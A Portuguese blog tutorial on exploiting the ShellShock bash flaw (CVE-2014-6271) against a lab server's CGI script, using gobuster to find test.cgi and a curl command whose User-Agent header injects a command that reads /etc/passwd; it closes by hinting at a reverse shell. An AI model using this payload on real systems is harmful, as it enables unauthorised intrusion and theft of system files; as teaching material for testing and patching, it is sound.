Explorando ShellShock na prática

Explorando ShellShock na prática

abr 13, 2021 Artigos por izaelbm

E ai blzinha, bom hoje vamos explorar uma falha bem interessante apresentada na versão ≤ 4.3.8 do bash, esta falha é conhecida como ShellShock(CVE-2014-6271).

A falha geralmente é encontrada em um script CGI vulnerável.(CGI – Wikipédia, a enciclopédia livre (wikipedia.org))

Bom sabendo destes conceitos básicos vamos para prática.

1 – Ao realizar o escaneamento no host descobrimos que ele possui o cgi-bin ativo, porem não temos acesso.

.2 – Agora vamos precisar fazer uma analise na aplicação afim de encontrarmos possíveis scripts .cgi, para realizar este processo podemos usar o GOBUSTER,DIRB ou NIKTO.

Nos iremos utilizar o GOBUSTER

$ gobuster dir -u http://192.168.18.5/cgi-bin/ -w /usr/share/wordlists/dirb/big.txt -x .cgi

Otimo, agora precisamos validar se este arquivo “test.cgi” é vulnerável , para isso podemos fazer o teste manualmente utilizando o curl.

1 – Utilizando o Curl

$ curl -H ‘User-Agent: () { echo; };echo; /bin/cat /etc/passwd‘ http://192.168.18.5/cgi-bin/test.cgi

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi

com o curl vamos enviar nosso payload dentro do header como user agent e vamos ver o comportamento.

Show é vulnerável veja, conseguimos o conteúdo do arquivo /etc/passwd, agora podemos tentar injetar outros códigos para tentar uma conexão reversa, mas agora é contigo.

E ai, Gostou?, deixe seu comentário e me siga nas redes sociais.

Nos vemos em breve, Até Mais……

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *